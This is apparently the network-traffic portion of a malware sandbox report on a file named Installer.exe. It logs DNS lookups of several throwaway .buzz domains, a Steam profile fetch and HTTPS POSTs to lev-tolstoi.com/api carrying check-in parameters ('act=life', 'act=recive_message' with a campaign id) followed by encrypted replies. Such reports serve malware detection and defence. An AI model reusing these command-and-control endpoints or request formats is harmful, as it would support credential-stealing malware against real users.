                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:46.299418926 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:46.299504042 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:46.300627947 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:46.300638914 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:46.300842047 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:46.307281971 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:46.307307005 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:46.307351112 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.067866087 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.068017006 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.068093061 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.068106890 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.068135977 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.068197966 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.068237066 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.068408966 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.070291042 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.070307016 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.075941086 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.079330921 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.079339981 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.084249020 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.084319115 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.084327936 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.092832088 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.092945099 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.093013048 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.102508068 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.102524996 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.102540970 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:47.102545977 CET44349747104.21.66.86192.168.2.4

                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.520955086 CET5894853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.748270988 CET53589481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.750802040 CET5556753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.889348984 CET53555671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.892683983 CET5987353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.030627966 CET53598731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.032330990 CET5088553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.170358896 CET53508851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.173218966 CET6110053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.310623884 CET53611001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.313226938 CET5253453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.451231003 CET53525341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.454549074 CET6260053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.592180967 CET53626001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.593933105 CET5568253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.731961012 CET53556821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.754492044 CET6283553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.894794941 CET53628351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.907233953 CET6232153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:24.127640963 CET53623211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.720062971 CET5259653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.952869892 CET53525961.1.1.1192.168.2.4

                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.520955086 CET192.168.2.41.1.1.10x8140Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.750802040 CET192.168.2.41.1.1.10x4033Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.892683983 CET192.168.2.41.1.1.10xd4a7Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.032330990 CET192.168.2.41.1.1.10x2e10Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.173218966 CET192.168.2.41.1.1.10xd367Standard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.313226938 CET192.168.2.41.1.1.10xd3a1Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.454549074 CET192.168.2.41.1.1.10xd334Standard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.593933105 CET192.168.2.41.1.1.10xf1a0Standard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.754492044 CET192.168.2.41.1.1.10xe88cStandard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.907233953 CET192.168.2.41.1.1.10x23acStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.720062971 CET192.168.2.41.1.1.10x5a04Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.748270988 CET1.1.1.1192.168.2.40x8140Name error (3)mindhandru.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:22.889348984 CET1.1.1.1192.168.2.40x4033Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.030627966 CET1.1.1.1192.168.2.40xd4a7Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.170358896 CET1.1.1.1192.168.2.40x2e10Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.310623884 CET1.1.1.1192.168.2.40xd367Name error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.451231003 CET1.1.1.1192.168.2.40xd3a1Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.592180967 CET1.1.1.1192.168.2.40xd334Name error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.731961012 CET1.1.1.1192.168.2.40xf1a0Name error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:23.894794941 CET1.1.1.1192.168.2.40xe88cName error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:24.127640963 CET1.1.1.1192.168.2.40x23acNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.952869892 CET1.1.1.1192.168.2.40x5a04No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.952869892 CET1.1.1.1192.168.2.40x5a04No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                  • lev-tolstoi.com

                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.44973423.55.153.1064437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:25 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:26 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:26 GMT
                                                                                                                                                                                                                                                  Content-Length: 35121
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=fd92c37599526c48ee9a2e2b; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2024-12-27 22:13:26 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                  2024-12-27 22:13:26 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                  Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                  2024-12-27 22:13:26 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                  Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.449735104.21.66.864437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:28 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                  2024-12-27 22:13:29 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:28 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=fdgeg9mgvu601pb18m2slj454d; expires=Tue, 22 Apr 2025 16:00:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTaTN%2BuzyfJmkHBfPb0lr03lOBcxwpDsiY947ZaHaUIGuQETOfnz8IM%2FwVZ%2FztgrZCyZZvkjck7jmV0qipyAB%2B34IR%2BtVdnVo9sBNV%2FgLbX%2B7VzikPRcwZPWrajc8ZuqSz0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca875ac873300-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1813&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1610590&cwnd=236&unsent_bytes=0&cid=20cb86ea1ae0903a&ts=766&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:13:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                  2024-12-27 22:13:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.449736104.21.66.864437488C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-27 22:13:30 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:30 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36 37 31 26 6a 3d
                                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--5223198671&j=
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:31 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=mh0fbkuv09iggm2loonnj879s3; expires=Tue, 22 Apr 2025 16:00:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48E51UsQl1YpHLnRVUDic3%2BzFMpKv9Mxp8OJM4FwIubNhL9mJuDAQ7036GBdUcVJ8oWZoFuyhdkNTMd8tp6PxKB8J5C3CGKcKXjSz7qgWupAF0JyxiGldjzGwcEfTbrHU3Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca882bfb19e04-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1781&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=951&delivery_rate=1562332&cwnd=236&unsent_bytes=0&cid=b353108630ab5be5&ts=825&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC250INData Raw: 34 37 31 0d 0a 74 4b 57 4d 6d 54 70 62 72 59 4d 47 39 58 58 32 78 51 47 61 32 41 4d 65 31 58 6c 31 68 75 54 35 76 74 51 33 62 30 50 50 41 56 72 50 68 2f 71 37 41 47 2b 42 6f 58 57 51 56 38 79 78 63 2b 2b 39 4c 7a 79 30 48 56 65 38 67 70 6a 53 70 31 4a 44 59 62 6c 73 65 49 37 44 37 66 56 4a 50 6f 47 68 59 34 31 58 7a 4a 35 36 75 4c 31 74 50 4f 39 62 45 4f 79 47 6d 4e 4b 32 56 67 51 73 76 32 30 35 33 4d 6e 72 38 56 38 34 79 65 4a 71 6d 42 43 54 6f 47 44 77 74 6d 70 7a 76 52 52 58 71 73 61 63 78 50 59 4e 54 51 36 71 64 54 76 35 78 50 2f 79 47 43 61 42 2b 43 53 51 47 39 54 2f 49 2f 75 39 59 58 4b 7a 48 52 37 75 6a 4a 48 61 74 31 4d 46 4d 36 5a 6e 4d 74 7a 48 36 50 42 56 4d 64 33 76 59 4a 38 62 6c 61 70 67 75 50 51 68 65 36 39 62 54 36 54 56 71
                                                                                                                                                                                                                                                  Data Ascii: 471tKWMmTpbrYMG9XX2xQGa2AMe1Xl1huT5vtQ3b0PPAVrPh/q7AG+BoXWQV8yxc++9Lzy0HVe8gpjSp1JDYblseI7D7fVJPoGhY41XzJ56uL1tPO9bEOyGmNK2VgQsv2053Mnr8V84yeJqmBCToGDwtmpzvRRXqsacxPYNTQ6qdTv5xP/yGCaB+CSQG9T/I/u9YXKzHR7ujJHat1MFM6ZnMtzH6PBVMd3vYJ8blapguPQhe69bT6TVq
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC894INData Raw: 64 2b 6e 52 42 67 73 76 57 56 34 79 59 6e 33 75 31 38 31 6a 37 6b 6b 6e 78 75 61 6f 6d 44 33 76 57 42 38 70 52 51 58 35 34 36 54 32 4c 78 61 41 69 36 6a 61 54 2f 65 7a 75 6e 30 58 7a 48 4a 37 6d 66 58 57 64 53 67 65 37 6a 69 49 56 79 6e 47 42 54 77 69 34 71 63 71 52 73 55 59 61 70 76 65 49 36 48 36 50 56 5a 4e 4d 2f 7a 62 4a 77 63 6b 62 56 6f 38 62 64 73 66 4c 6f 52 47 4f 65 47 6e 4e 61 38 57 67 63 6c 6f 47 34 2b 31 73 65 75 74 52 67 2b 31 36 45 38 31 7a 53 52 74 32 54 30 72 43 4e 47 39 77 52 5a 2f 63 61 63 30 50 59 4e 54 53 6d 6f 59 44 76 64 79 4f 33 7a 55 79 76 50 38 32 4b 61 45 6f 61 68 5a 76 61 77 59 6d 36 39 46 52 48 6e 6a 35 44 56 73 31 49 4a 59 65 4d 6a 50 38 36 48 74 72 74 35 4e 4d 54 74 62 6f 41 58 31 4c 67 74 34 66 70 6d 63 50 64 44 56 2b 43 48
                                                                                                                                                                                                                                                  Data Ascii: d+nRBgsvWV4yYn3u181j7kknxuaomD3vWB8pRQX546T2LxaAi6jaT/ezun0XzHJ7mfXWdSge7jiIVynGBTwi4qcqRsUYapveI6H6PVZNM/zbJwckbVo8bdsfLoRGOeGnNa8WgcloG4+1seutRg+16E81zSRt2T0rCNG9wRZ/cac0PYNTSmoYDvdyO3zUyvP82KaEoahZvawYm69FRHnj5DVs1IJYeMjP86Htrt5NMTtboAX1Lgt4fpmcPdDV+CH
                                                                                                                                                                                                                                                  2024-12-27 22:13:31 UTC1369INData Raw: 34 34 61 62 0d 0a 2f 76 49 67 70 79 78 57 55 31 35 37 57 77 33 32 63 2f 75 2b 6c 77 30 79 2b 42 70 6d 78 36 58 71 32 2f 77 74 32 31 34 75 42 4d 66 35 34 36 4a 30 72 68 54 43 79 47 6f 49 33 61 57 77 50 61 37 41 48 6e 72 37 33 4f 44 48 4e 61 53 59 50 61 30 5a 6d 72 33 42 46 6e 39 78 70 7a 51 39 67 31 4e 4c 36 42 6f 4e 4e 48 4f 37 2f 68 59 4d 38 48 75 62 70 38 66 6c 4b 70 69 38 37 4a 6e 63 62 77 55 47 4f 4f 4f 6d 4e 43 7a 57 41 35 68 34 79 4d 2f 7a 6f 65 32 75 33 30 33 7a 50 42 31 31 53 4b 58 71 57 33 2f 72 43 46 6a 2b 51 4a 58 34 34 72 62 68 50 5a 66 43 69 61 70 62 6a 4c 56 77 2b 72 32 56 7a 44 47 36 48 61 64 47 35 71 31 62 76 4b 2f 62 33 43 79 46 42 66 6c 68 35 58 57 76 52 56 44 59 61 70 37 65 49 36 48 77 66 5a 49 4b 38 58 71 64 64 55 69 6c 36 6c 74 2f 36
                                                                                                                                                                                                                                                  Data Ascii: 44ab/vIgpyxWU157Ww32c/u+lw0y+Bpmx6Xq2/wt214uBMf546J0rhTCyGoI3aWwPa7AHnr73ODHNaSYPa0Zmr3BFn9xpzQ9g1NL6BoNNHO7/hYM8Hubp8flKpi87JncbwUGOOOmNCzWA5h4yM/zoe2u303zPB11SKXqW3/rCFj+QJX44rbhPZfCiapbjLVw+r2VzDG6HadG5q1bvK/b3CyFBflh5XWvRVDYap7eI6HwfZIK8XqddUil6lt/6
